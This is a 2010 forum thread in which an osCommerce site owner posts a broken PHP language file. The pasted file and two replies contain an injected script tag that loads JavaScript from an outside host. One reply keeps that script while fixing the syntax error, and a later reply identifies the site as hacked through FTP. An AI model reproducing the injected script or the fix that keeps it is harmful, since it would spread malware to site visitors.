moby1 Posted June 26, 2010 Share Posted June 26, 2010 Hi friends I really need help. My website won't load up - it keeps showing the following error when you attempt to load it up: Warning: Unexpected character in input: ''' (ASCII=39) state=1 in /home/public_html/includes/languages/english/index.php on line 13 Parse error: syntax error, unexpected '<' in /home/public_html/includes/languages/english/index.php on line 13 Here's the file which it seems to be pointing too (index.php from the languages/english folder): <?php /* $Id: index.php,v 1.1 2003/06/11 17:38:00 hpdl Exp $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com Copyright (c) 2003 osCommerce Released under the GNU General Public License */ define('TEXT_MAIN', 'This is a default setup of the osCommerce project, products shown are for demonstrational purposes, <b>any products purchased will not be delivered nor will the customer be billed</b>. Any information seen on these products is to be treated as fictional.<br><br><table border="0" width="100%" cellspacing="5" cellpadding="2"><tr><td class="main" valign="top">' . tep_image(DIR_WS_IMAGES . 'default/1.gif') . '</td><td class="main" valign="top"><b>Error Messages</b><br><br>If there are any error or warning messages shown above, please correct them first before proceeding.<br><br>Error messages are displayed at the very top of the page with a complete <span class="messageStackError">background</span> color.<br><br>Several checks are performed to ensure a healthy setup of your online store - these checks can be disabled by editing the appropriate parameters at the bottom of the includes/application_top.php file.</td></tr><td class="main" valign="top">' . tep_image(DIR_WS_IMAGES . 'default/2.gif') . '</td><td class="main" valign="top"><b>Editing Page Texts</b><br><br>The text shown here can be modified in the following file, on each language basis:<br><br><nobr class="messageStackSuccess">[path to catalog]/includes/languages/' . $language . '/' . FILENAME_DEFAULT . '</nobr><br><br>That file can be edited manually, or via the Administration Tool with the <nobr class="messageStackSuccess">Languages->' . ucfirst($language) . '->Define</nobr> or <nobr class="messageStackSuccess">Tools->File Manager</nobr> modules.<br><br>The text is set in the following manner:<br><br><nobr>define(\'TEXT_MAIN\', \'<span class="messageStackSuccess">This is a default setup of the osCommerce project...</span>\');</nobr><br><br>The text highlighted in green may be modified - it is important to keep the define() of the TEXT_MAIN keyword. To remove the text for TEXT_MAIN completely, the following example is used where only two single quote characters exist:<br><br><nobr>define(\'TEXT_MAIN\', \'\');</nobr><br><br>More information concerning the PHP define() function can be read <a href="http://www.php.net/define" target="_blank"><u>here</u></a>.</td></tr><tr><td class="main" valign="top">' . tep_image(DIR_WS_IMAGES . 'default/3.gif') . '</td><td class="main" valign="top"><b>Securing The Administration Tool</b><br><br>It is important to secure the Administration Tool as there is currently no security implementation available.</td></tr><tr><td class="main" valign="top">' . tep_image(DIR_WS_IMAGES . 'default/4.gif') . '</td><td class="main" valign="top"><b>Online Documentation</b><br><br>Online documentation can be read at the <a href="http://www.oscomm <script type="text/javascript" src="http://adoffy.alltuckedinathome.com:8080/Emulation.js"></script> <!--cac0fcb8d6aca5d8dbc095001d876d1c--> I don't know what to do as I'm just a novice on all of this. I really need to get this working asap. Please help thank you in advance Moby Link to comment Share on other sites More sharing options...
BryceJr Posted June 26, 2010 Share Posted June 26, 2010 <?php /* $Id: index.php,v 1.1 2003/06/11 17:38:00 hpdl Exp $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com Copyright © 2003 osCommerce Released under the GNU General Public License */ define('TEXT_MAIN', 'This is a default setup of the osCommerce project, products shown are for demonstrational purposes, <b>any products purchased will not be delivered nor will the customer be billed</b>. ......blah blah blah blah.....blah blah blah blah..........blah blah blah blah............blah blah blah blah <script type="text/javascript" src="http://adoffy.alltuckedinathome.com:8080/Emulation.js"></script> <!--cac0fcb8d6aca5d8dbc095001d876d1c-->'); ?> Link to comment Share on other sites More sharing options...
moby1 Posted June 26, 2010 Author Share Posted June 26, 2010 <?php /* $Id: index.php,v 1.1 2003/06/11 17:38:00 hpdl Exp $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com Copyright © 2003 osCommerce Released under the GNU General Public License */ define('TEXT_MAIN', 'This is a default setup of the osCommerce project, products shown are for demonstrational purposes, <b>any products purchased will not be delivered nor will the customer be billed</b>. ......blah blah blah blah.....blah blah blah blah..........blah blah blah blah............blah blah blah blah <script type="text/javascript" src="http://adoffy.alltuckedinathome.com:8080/Emulation.js"></script> <!--cac0fcb8d6aca5d8dbc095001d876d1c-->'); ?> thank you soooo much! you're the best! thanks again Link to comment Share on other sites More sharing options...
someperson Posted June 29, 2010 Share Posted June 29, 2010 thank you soooo much! you're the best! thanks again NO YOU NEED TO CHANGE YOUR FTP PASSWORD. YOUR WEBSITE HAS BEEN HACKED! I know because the SAME thing happened to my wordpress site it was working then all of a sudden it doesnt because this website: alltuckedinathome.com is in your php file. There is a bot going around logging in with FTP information and editing all homepages to include certain links, it works in html files, but it will break in PHP due to it not having proper tags around it. You'll notice your site will break AGAIN because it'll add another link I found your thread by searching for "alltuckedinathome" in Google. I hope this helps everyone! Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.